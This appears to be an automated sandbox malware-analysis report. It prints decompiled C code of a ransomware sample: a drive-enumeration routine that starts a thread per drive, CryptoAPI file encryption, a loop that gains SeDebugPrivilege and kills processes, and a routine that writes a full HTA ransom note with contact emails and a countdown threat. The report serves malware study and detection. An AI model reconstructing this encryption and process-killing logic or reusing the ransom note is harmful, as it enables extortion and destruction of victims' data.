    • Instruction ID: e58090ff3f4ac20de8e3d49f50c8b8bbbfeb820762b890c8c6496d2121d6898d
    • Opcode Fuzzy Hash: 9d12d4a99be906757fec16f8f7037c86217b6b9286bb6862ec45515e6ecea0d5
    • Instruction Fuzzy Hash: F6414C70D4010AAEDF11EBE1CD42FAEBBB5AF08314F20416AF920BA1F1D7785A119B59
    Uniqueness

    Uniqueness Score: -1,00%

    Function 004016FF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46threadstringCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004016FF() {
				void* _v8;
				void* _t4;
				signed int _t6;
				WCHAR* _t7;
				WCHAR* _t8;
				void* _t9;
				signed char _t14;
				void* _t15;

				_t4 = CreateThread(0, 0, E00401131, 0, 0, 0); // executed
				CloseHandle(_t4); // executed
				_t6 = GetLogicalDrives(); // executed
				_t14 = 0x19;
				do {
					if((0x00000001 << _t14 & _t6) != 0) {
						_t7 = E00401781(0x18060);
						_v8 = _t7;
						_t8 = lstrcatW(_t7, L"\\\\?\\C:\\*.*");
						_t15 = _t14;
						_t8[4] = _t15 + 0x41;
						 *0x403ab7 =  *0x403ab7 + 1;
						_t9 = CreateThread(0, 0xffff, E004014CC, _v8, 0, 0); // executed
						CloseHandle(_t9); // executed
						_t14 = _t15;
						_t6 = _t6;
					}
					_t14 = _t14 - 1;
				} while (_t14 >= 0);
				return _t6;
			}











    0x00401714
    0x0040171a
    0x0040171f
    0x00401724
    0x00401729
    0x00401732
    0x0040173b
    0x00401740
    0x00401749
    0x0040174e
    0x00401753
    0x00401756
    0x0040176f
    0x00401775
    0x0040177a
    0x0040177b
    0x0040177b
    0x0040177c
    0x0040177c
    0x00401780

    APIs
    • CreateThread.KERNEL32 ref: 00401714
    • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_00001131,00000000,00000000,00000000), ref: 0040171A
    • GetLogicalDrives.KERNEL32 ref: 0040171F
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,?,?,004010A6,00008000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,?,?,004010A6,00008000), ref: 00401797
    • lstrcatW.KERNEL32(00000000,\\?\C:\*.*), ref: 00401749
    • CreateThread.KERNEL32 ref: 0040176F
    • CloseHandle.KERNEL32(00000000,00000000,0000FFFF,Function_000014CC,?,00000000,00000000,00000000,\\?\C:\*.*,00018060,00000019,00000000,00000000,00000000,00000000,Function_00001131), ref: 00401775
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: CloseCreateHandleThread$AllocDrivesGlobalLogicalSleeplstrcat
    • String ID: \\?\C:\*.*
    • API String ID: 3649909306-1790711283
    • Opcode ID: aa36bdb46a48c8bc4b72e55a2e5d77653a2ea84c6b11e826cca7d57258d30290
    • Instruction ID: b0a1643d7e9e57bc3e1be9d92316a81e3967ff597d52ac60f2e66cf42192e3bd
    • Opcode Fuzzy Hash: aa36bdb46a48c8bc4b72e55a2e5d77653a2ea84c6b11e826cca7d57258d30290
    • Instruction Fuzzy Hash: 62F06774B843013AFA1032B29C47F6F2A588B00B19F34013BBB00BA1F3D9FC6940426C
    Uniqueness

    Uniqueness Score: -1,00%

    Function 004016FF, Relevance: 9.0, APIs: 6, Instructions: 46threadstringCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 111 4016ff-401724 CreateThread CloseHandle GetLogicalDrives 112 401729-401732 111->112 113 401734-40177b call 401781 lstrcatW CreateThread CloseHandle 112->113 114 40177c-40177d 112->114 113->114 114->112 116 40177f-401780 114->116
    C-Code - Quality: 100%
    			E004016FF() {
				void* _v8;
				void* _t4;
				signed int _t6;
				WCHAR* _t7;
				WCHAR* _t8;
				void* _t9;
				signed char _t14;
				void* _t15;

				_t4 = CreateThread(0, 0, E00401131, 0, 0, 0); // executed
				CloseHandle(_t4); // executed
				_t6 = GetLogicalDrives(); // executed
				_t14 = 0x19;
				do {
					if((0x00000001 << _t14 & _t6) != 0) {
						_t7 = E00401781(0x18060);
						_v8 = _t7;
						_t8 = lstrcatW(_t7, 0x403abf);
						_t15 = _t14;
						_t8[4] = _t15 + 0x41;
						 *0x403ab7 =  *0x403ab7 + 1;
						_t9 = CreateThread(0, 0xffff, E004014CC, _v8, 0, 0); // executed
						CloseHandle(_t9); // executed
						_t14 = _t15;
						_t6 = _t6;
					}
					_t14 = _t14 - 1;
				} while (_t14 >= 0);
				return _t6;
			}











    0x00401714
    0x0040171a
    0x0040171f
    0x00401724
    0x00401729
    0x00401732
    0x0040173b
    0x00401740
    0x00401749
    0x0040174e
    0x00401753
    0x00401756
    0x0040176f
    0x00401775
    0x0040177a
    0x0040177b
    0x0040177b
    0x0040177c
    0x0040177c
    0x00401780

    APIs
    • CreateThread.KERNEL32 ref: 00401714
    • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_00001131,00000000,00000000,00000000), ref: 0040171A
    • GetLogicalDrives.KERNEL32 ref: 0040171F
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,00401160,?,00401160,00004000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,00401160,?,00401160,00004000), ref: 00401797
    • lstrcatW.KERNEL32(00000000,00403ABF), ref: 00401749
    • CreateThread.KERNEL32 ref: 0040176F
    • CloseHandle.KERNEL32(00000000,00000000,0000FFFF,Function_000014CC,?,00000000,00000000,00000000,00403ABF,00018060,00000019,00000000,00000000,00000000,00000000,Function_00001131), ref: 00401775
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: CloseCreateHandleThread$AllocDrivesGlobalLogicalSleeplstrcat
    • String ID:
    • API String ID: 3649909306-0
    • Opcode ID: aa36bdb46a48c8bc4b72e55a2e5d77653a2ea84c6b11e826cca7d57258d30290
    • Instruction ID: b0a1643d7e9e57bc3e1be9d92316a81e3967ff597d52ac60f2e66cf42192e3bd
    • Opcode Fuzzy Hash: aa36bdb46a48c8bc4b72e55a2e5d77653a2ea84c6b11e826cca7d57258d30290
    • Instruction Fuzzy Hash: 62F06774B843013AFA1032B29C47F6F2A588B00B19F34013BBB00BA1F3D9FC6940426C
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00401781, Relevance: 2.5, APIs: 2, Instructions: 12sleepmemoryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00401781(long _a4) {
				void* _t2;
				void* _t3;

				while(1) {
					_t2 = GlobalAlloc(0x40, _a4); // executed
					_t3 = _t2;
					if(_t3 != 0) {
						break;
					}
					Sleep(0xc8);
				}
				return _t3;
			}





    0x00401784
    0x00401789
    0x0040178e
    0x00401790
    0x00000000
    0x00000000
    0x00401797
    0x00401797
    0x0040179f

    APIs
    • GlobalAlloc.KERNEL32(00000040,?,?,004010A6,00008000), ref: 00401789
    • Sleep.KERNEL32(000000C8,00000040,?,?,004010A6,00008000), ref: 00401797
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: AllocGlobalSleep
    • String ID:
    • API String ID: 3298491466-0
    • Opcode ID: 7832efefc5be9b14c12cba2e4d46ab7235feb5e85635f8b8aa422e3e06fd54af
    • Instruction ID: d11a4110819027fe4db93a80e8c688afe7ee3929f15eaffbac0944ca7f306c1c
    • Opcode Fuzzy Hash: 7832efefc5be9b14c12cba2e4d46ab7235feb5e85635f8b8aa422e3e06fd54af
    • Instruction Fuzzy Hash: 69C08C2034020962D54072A28C03F5938850711BCCF004033FB05760E2D8FCC00401AE
    Uniqueness

    Uniqueness Score: -1,00%

    Non-executed Functions

    Function 0040128D, Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 191filesleepCOMMON
    Download Yara Rule

    Control-flow Graph

    C-Code - Quality: 63%
    			E0040128D(WCHAR* _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				void* _v16;
				void* _v20;
				long* _v24;
				long* _v28;
				long _v32;
				void _v288;
				WCHAR* _t51;
				WCHAR* _t52;
				WCHAR* _t55;
				void* _t56;
				void* _t57;
				int _t62;
				long** _t65;
				void* _t67;
				intOrPtr _t68;
				unsigned int _t69;
				void* _t70;
				void* _t76;
				void* _t95;
				intOrPtr _t96;

				asm("pushad");
				_t51 = _a4;
				_t52 =  &(_t51[0x4010]);
				_push(_t52);
				if(MoveFileW(_t51, _t52) != 0) {
					_pop(_t55);
					_t56 = CreateFileW(_t55, 0xc0000000, 0, 0, 3, 0, 0);
					if(_t56 != 0xffffffff) {
						_v8 = _t56;
						_t57 = CreateFileMappingA(_v8, 0, 4, 0, 0, 0);
						if(_t57 <= 0) {
							L8:
							CloseHandle(_v8);
							goto L3;
						} else {
							_v16 = _t57;
							if(CryptAcquireContextA( &_v24, 0, 0, 0x18, 0xf0000000) == 1) {
								_t65 =  &_v28;
								_push(_t65);
								_push(1);
								_push(0x6610);
								_push(_v24);
								L00401F86();
								if(_t65 == 1) {
									_v32 = 0x2c;
									_push( &_v32);
									_t67 =  &_v288;
									_push(_t67);
									_push(0);
									_push(8);
									_push(0);
									_push(_v28);
									L00401F80();
									if(_t67 == 1) {
										_t96 = _a8;
										_t95 =  &_v288;
										_t68 =  *((intOrPtr*)(_t96 + 0x1c));
										 *((intOrPtr*)(_t95 + 0x2c)) = _t68;
										if(_t68 <= 0) {
											_t69 =  *(_t96 + 0x20);
											 *(_t95 + 0x30) = _t69;
											if(_t69 >= 0x100000) {
												if(_t69 > 0x100000) {
													_t69 = 0x100000;
												}
											} else {
												_t69 = _t69 >> 5 << 5;
											}
										} else {
											 *(_t95 + 0x30) =  *(_t96 + 0x20);
											_t69 = 0x100000;
										}
										 *(_t95 + 0x34) = _t69;
										_v32 = _t69;
										_t70 = MapViewOfFile(_v16, 2, 0, 0, _v32);
										if(_t70 <= 0) {
											goto L14;
										} else {
											_v20 = _t70;
											 *(_t95 + 0x38) =  *_t70;
											 *((char*)(_t95 + 0x3e)) = 0x33;
											_v12 = 0x40;
											_push(0x100);
											_push( &_v12);
											_t76 =  &_v288;
											_push(_t76);
											_push(0);
											_push(1);
											_push(0);
											_push( *0x403abb);
											L00401F7A();
											if(_t76 == 1) {
												_push(_v32);
												_push( &_v32);
												_push(_v20);
												_push(0);
												_push(0);
												_push(0);
												_push(_v28);
												L00401F7A();
												UnmapViewOfFile(_v20);
												CloseHandle(_v16);
												CryptDestroyKey(_v28);
												CryptReleaseContext(_v24, 0);
												_push(2);
												SetFilePointerEx(_v8, 0, 0, 0);
												WriteFile(_v8,  &_v288, 0x100,  &_v12, 0);
												WriteFile(_v8, 0x4040e0, 0x500,  &_v12, 0);
												CloseHandle(_v8);
												_t62 = SetFileAttributesW( &(_a4[0x4010]), 1);
											} else {
												goto L14;
											}
										}
									} else {
										L14:
										CryptDestroyKey(_v28);
										goto L12;
									}
								} else {
									L12:
									CryptReleaseContext(_v24, 0);
									goto L10;
								}
							} else {
								L10:
								CloseHandle(_v16);
								goto L8;
							}
						}
					} else {
						while(1) {
							L3:
							_t62 = MoveFileW( &(_a4[0x4010]), _a4);
							if(_t62 != 0) {
								break;
							}
							Sleep(0xc8);
						}
					}
				} else {
					_pop(_t62);
				}
				asm("popad");
				return _t62;
			}

























    0x00401296
    0x00401297
    0x0040129c
    0x004012a1
    0x004012ab
    0x004012b3
    0x004012c4
    0x004012cc
    0x004012f4
    0x00401304
    0x0040130c
    0x00401313
    0x00401316
    0x00000000
    0x0040130e
    0x0040130e
    0x00401334
    0x00401340
    0x00401343
    0x00401344
    0x00401346
    0x0040134b
    0x0040134e
    0x00401356
    0x00401364
    0x0040136e
    0x0040136f
    0x00401375
    0x00401376
    0x00401378
    0x0040137a
    0x0040137c
    0x0040137f
    0x00401387
    0x00401393
    0x00401396
    0x0040139c
    0x0040139f
    0x004013a5
    0x004013b4
    0x004013b7
    0x004013bf
    0x004013ce
    0x004013d0
    0x004013d0
    0x004013c1
    0x004013c4
    0x004013c4
    0x004013a7
    0x004013aa
    0x004013ad
    0x004013ad
    0x004013d5
    0x004013d8
    0x004013e7
    0x004013ef
    0x00000000
    0x004013f1
    0x004013f1
    0x004013fa
    0x004013fd
    0x00401401
    0x00401408
    0x00401410
    0x00401411
    0x00401417
    0x00401418
    0x0040141a
    0x0040141c
    0x0040141e
    0x00401424
    0x0040142c
    0x00401433
    0x00401439
    0x0040143a
    0x0040143d
    0x0040143f
    0x00401441
    0x00401443
    0x00401446
    0x0040144e
    0x00401456
    0x0040145e
    0x00401468
    0x0040146d
    0x00401478
    0x00401492
    0x004014aa
    0x004014b2
    0x004014c2
    0x0040142e
    0x00000000
    0x0040142e
    0x0040142c
    0x00401389
    0x00401389
    0x0040138c
    0x00000000
    0x0040138c
    0x00401358
    0x00401358
    0x0040135d
    0x00000000
    0x0040135d
    0x00401336
    0x00401336
    0x00401339
    0x00000000
    0x00401339
    0x00401334
    0x004012ce
    0x004012ce
    0x004012ce
    0x004012df
    0x004012e1
    0x00000000
    0x00000000
    0x004012e8
    0x004012e8
    0x004012ef
    0x004012ad
    0x004012ad
    0x004012ad
    0x004014c7
    0x004014c9

    APIs
    • MoveFileW.KERNEL32(?,?), ref: 004012A4
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 004012C4
    • MoveFileW.KERNEL32(?,?), ref: 004012DA
    • Sleep.KERNEL32(000000C8,?,?,?,?,00000000,00000004,00000000,00000000,00000000,?,C0000000,00000000,00000000,00000003,00000000), ref: 004012E8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: File$Move$CreateSleep
    • String ID: ,$@
    • API String ID: 2501303177-1227015840
    • Opcode ID: d0a331b171ffca60f20f239a969b54affadaf494ef6a999c2c785b2d56c08486
    • Instruction ID: 5a792c085b85204088bbff500eab9d33f6de6564df96690a2bd5524aa7c615fe
    • Opcode Fuzzy Hash: d0a331b171ffca60f20f239a969b54affadaf494ef6a999c2c785b2d56c08486
    • Instruction Fuzzy Hash: 96618370A40209BAEF219BA1CC43FEE7674BB04704F204137BA01F95F1D7B9AA519B5D
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00401D2D, Relevance: 16.6, APIs: 11, Instructions: 57stringsleepprocessCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 159 401d2d-401d3d call 401de7 161 401d42-401d61 CreateToolhelp32Snapshot Process32FirstW 159->161 162 401d66-401d69 161->162 163 401dd2-401de2 CloseHandle Sleep 162->163 164 401d6b 162->164 163->161 165 401d71-401d80 lstrcmpiW 164->165 166 401d82-401d91 lstrlenW 165->166 167 401dc3-401dd0 Process32NextW 165->167 168 401d93 166->168 169 401d95-401da0 GetCurrentProcessId 166->169 167->162 168->165 169->167 170 401da2-401db3 OpenProcess 169->170 170->167 171 401db5-401dbe TerminateProcess CloseHandle 170->171 171->167
    C-Code - Quality: 100%
    			E00401D2D() {
				short _v524;
				long _v552;
				void* _v560;
				struct tagPROCESSENTRY32W* _t10;
				void* _t21;
				void* _t24;
				WCHAR* _t25;

				E00401DE7(0x403a19, 1);
				while(1) {
					_t24 = CreateToolhelp32Snapshot(2, 0);
					_v560 = 0x22c;
					_t10 =  &_v560;
					Process32FirstW(_t24, _t10);
					while(_t10 != 0) {
						while(lstrcmpiW( &_v524, _t25) != 0) {
							_t25 =  &(_t25[lstrlenW(_t25) + 1]);
							if( *_t25 == 0) {
								if(GetCurrentProcessId() != _v552) {
									_t21 = OpenProcess(1, 0, _v552);
									if(_t21 != 0) {
										TerminateProcess(_t21, 0);
										CloseHandle(_t21);
									}
								}
								break;
							} else {
								continue;
							}
						}
						_t10 = Process32NextW(_t24,  &_v560);
					}
					CloseHandle(_t24);
					Sleep(0x3e8);
				}
			}










    0x00401d3d
    0x00401d42
    0x00401d4b
    0x00401d4d
    0x00401d59
    0x00401d61
    0x00401d66
    0x00401d71
    0x00401d8b
    0x00401d91
    0x00401da0
    0x00401db1
    0x00401db3
    0x00401db9
    0x00401dbe
    0x00401dbe
    0x00401db3
    0x00000000
    0x00401d93
    0x00000000
    0x00401d93
    0x00401d91
    0x00401dcb
    0x00401dcb
    0x00401dd3
    0x00401ddd
    0x00401ddd

    APIs
      • Part of subcall function 00401DE7: OpenProcessToken.ADVAPI32(000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000,00403ABB), ref: 00401DF5
      • Part of subcall function 00401DE7: LookupPrivilegeValueA.ADVAPI32(00000000,00008000,00000000), ref: 00401E07
      • Part of subcall function 00401DE7: AdjustTokenPrivileges.ADVAPI32(00008000,00000000,00000001,00000000,00000000,00000000,000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500), ref: 00401E3C
      • Part of subcall function 00401DE7: CloseHandle.KERNEL32(00008000,000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000), ref: 00401E44
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401D46
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00401D61
    • lstrcmpiW.KERNEL32(?,?,00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401D79
    • lstrlenW.KERNEL32(?,?,?,00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401D83
    • GetCurrentProcessId.KERNEL32(?,?,?,00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401D95
    • OpenProcess.KERNEL32(00000001,00000000,?,?,?,?,00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401DAC
    • TerminateProcess.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,?,?,?,00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401DB9
    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,?,?,?,00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401DBE
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00401DCB
    • CloseHandle.KERNEL32(00000000), ref: 00401DD3
    • Sleep.KERNEL32(000003E8,00000000), ref: 00401DDD
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: Process$CloseHandle$OpenProcess32Token$AdjustCreateCurrentFirstLookupNextPrivilegePrivilegesSleepSnapshotTerminateToolhelp32Valuelstrcmpilstrlen
    • String ID:
    • API String ID: 1125620571-0
    • Opcode ID: 2635ff061ca8914c2d9180501c8d943a13cba462529c84550a6d81b87420486c
    • Instruction ID: c66f2fec3916f796175e6449ba9ccfba13e260c703c5d1e17e7cbe5dabbd16b8
    • Opcode Fuzzy Hash: 2635ff061ca8914c2d9180501c8d943a13cba462529c84550a6d81b87420486c
    • Instruction Fuzzy Hash: 2701566161021576D72177F2DC47FAE719C5F04344F10087BB645F51F3DABCAA8146AD
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00401D2D, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 57stringsleepprocessCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00401D2D() {
				short _v524;
				long _v552;
				void* _v560;
				struct tagPROCESSENTRY32W* _t10;
				void* _t21;
				void* _t24;
				WCHAR* _t25;

				E00401DE7("SeDebugPrivilege", 1);
				while(1) {
					_t24 = CreateToolhelp32Snapshot(2, 0);
					_v560 = 0x22c;
					_t10 =  &_v560;
					Process32FirstW(_t24, _t10);
					while(_t10 != 0) {
						while(lstrcmpiW( &_v524, _t25) != 0) {
							_t25 =  &(_t25[lstrlenW(_t25) + 1]);
							if( *_t25 == 0) {
								if(GetCurrentProcessId() != _v552) {
									_t21 = OpenProcess(1, 0, _v552);
									if(_t21 != 0) {
										TerminateProcess(_t21, 0);
										CloseHandle(_t21);
									}
								}
								break;
							} else {
								continue;
							}
						}
						_t10 = Process32NextW(_t24,  &_v560);
					}
					CloseHandle(_t24);
					Sleep(0x3e8);
				}
			}










    0x00401d3d
    0x00401d42
    0x00401d4b
    0x00401d4d
    0x00401d59
    0x00401d61
    0x00401d66
    0x00401d71
    0x00401d8b
    0x00401d91
    0x00401da0
    0x00401db1
    0x00401db3
    0x00401db9
    0x00401dbe
    0x00401dbe
    0x00401db3
    0x00000000
    0x00401d93
    0x00000000
    0x00401d93
    0x00401d91
    0x00401dcb
    0x00401dcb
    0x00401dd3
    0x00401ddd
    0x00401ddd

    APIs
      • Part of subcall function 00401DE7: OpenProcessToken.ADVAPI32(000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000,@l), ref: 00401DF5
      • Part of subcall function 00401DE7: LookupPrivilegeValueA.ADVAPI32(00000000,00008000,00000000), ref: 00401E07
      • Part of subcall function 00401DE7: AdjustTokenPrivileges.ADVAPI32(00008000,00000000,00000001,00000000,00000000,00000000,000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500), ref: 00401E3C
      • Part of subcall function 00401DE7: CloseHandle.KERNEL32(00008000,000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000), ref: 00401E44
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401D46
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00401D61
    • lstrcmpiW.KERNEL32(?,[System process],00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401D79
    • lstrlenW.KERNEL32([System process],?,[System process],00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401D83
    • GetCurrentProcessId.KERNEL32([System process],?,[System process],00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401D95
    • OpenProcess.KERNEL32(00000001,00000000,?,[System process],?,[System process],00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401DAC
    • TerminateProcess.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,[System process],?,[System process],00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401DB9
    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,[System process],?,[System process],00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401DBE
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00401DCB
    • CloseHandle.KERNEL32(00000000), ref: 00401DD3
    • Sleep.KERNEL32(000003E8,00000000), ref: 00401DDD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp Download File
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: Process$CloseHandle$OpenProcess32Token$AdjustCreateCurrentFirstLookupNextPrivilegePrivilegesSleepSnapshotTerminateToolhelp32Valuelstrcmpilstrlen
    • String ID: SeDebugPrivilege$[System process]
    • API String ID: 1125620571-1351572248
    • Opcode ID: 2635ff061ca8914c2d9180501c8d943a13cba462529c84550a6d81b87420486c
    • Instruction ID: c66f2fec3916f796175e6449ba9ccfba13e260c703c5d1e17e7cbe5dabbd16b8
    • Opcode Fuzzy Hash: 2635ff061ca8914c2d9180501c8d943a13cba462529c84550a6d81b87420486c
    • Instruction Fuzzy Hash: 2701566161021576D72177F2DC47FAE719C5F04344F10087BB645F51F3DABCAA8146AD
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00401096, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25stringfileCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00401096(WCHAR* _a4) {
				void* _v8;
				WCHAR* _v12;
				long _v16;
				WCHAR* _t18;

				_t18 = E00401781(0x8000);
				_v12 = _t18;
				lstrcpyW(_v12, _a4);
				 *((char*)(_v12 + lstrlenW(_v12) * 2 - 6)) = 0;
				lstrcatW(_v12, L"Decoding help.hta");
				if(GetFileAttributesW(_v12) == 0xffffffff) {
					_v8 = CreateFileW(_v12, 0x40000000, 2, 0, 2, 0, 0);
					WriteFile(_v8, "<html><head><hta:application id=1\r\nshowInTaskBar=no\r\ncaption=no\r\nborder=none\r\ninnerBorder=no\r\nscroll=no\r\ncontextmenu=no\r\nwindowstate=maximize />\r\n<script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!=\'undefined\'?Y:now.getFullYear();Z=Z?Z-1:now.getMonth();D=typeof(D)!=\'undefined\'?D:now.getDate();H=typeof(H)!=\'undefined\'?H:now.getHours();M=typeof(M)!=\'undefined\'?M:now.getMinutes();var endDate=new Date(Y,Z,D,H,M,s+1);var i=setInterval(function(){var t=endDate.getTime()-now.getTime();if(t<0){clearInterval(i);alert(\'Time is up!\');}else{var d=Math.floor(t/864e5);var h=Math.floor(t/36e5)%24;var o=Math.floor(t/6e4)%60;var p=Math.floor(t/1e3)%60;var i=\'<div style=\"width:90px;float:left;text-align:center\"><div style=\"font-size:65px;\">\';var l=\'</div><div>\';var e=\'</div></div><div style=\"float:left;font-size:60px;\">:</div>\';document.getElementById(\'X\').innerHTML=i+d+l+\'Day\'+e+i+h+l+\'Hours\'+e+i+o+l+\'Minutes\'+e+i+p+l+\'Seconds\';if(!p&&!o&&!d&&!h){clearInterval(i);alert(\'Time is up!\');}}now.setSeconds(now.getSeconds()+1);},1000);}C(00,00,12,04,05,2019);</script></head><body style=\'text-align:center;background:#000\'></br></br></br><h2 style=\'font-size:40px;color:#b00\'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonStokton@tutanota.com</h2></br></br><h1 style=\'color:#FFF\'>Your<h2 style=\'font-size:40px;color:#00F\'> [ID]XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!</br>Attention!!!</br>At the end of this time, the private key for generating the decoder will be destroyed. Files will not be restored!</h1></br></br><div id=\'X\' style=\'position:absolute;left:40%;color:#F00\'></div></body></html>",  *0x403ab3,  &_v16, 0);
					CloseHandle(_v8);
					SetFileAttributesW(_v12, 1);
				}
				return GlobalFree(_v12);
			}







    0x004010a1
    0x004010a6
    0x004010af
    0x004010bf
    0x004010cc
    0x004010dc
    0x004010f7
    0x0040110e
    0x00401116
    0x00401120
    0x00401120
    0x0040112e

    APIs
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,?,?,004010A6,00008000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,?,?,004010A6,00008000), ref: 00401797
    • lstrcpyW.KERNEL32 ref: 004010AF
    • lstrlenW.KERNEL32(?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010B7
    • lstrcatW.KERNEL32(?,Decoding help.hta), ref: 004010CC
    • GetFileAttributesW.KERNEL32(?,?,?,?,0000002C,00000000,00000000,?,?,00000000,00000000,00000018,F0000000), ref: 004010D4
    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000,?,?,?,?,0000002C,00000000,00000000,?,?), ref: 004010F2
    • WriteFile.KERNEL32(004017A2,<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000,?,?,?,?,0000002C), ref: 0040110E
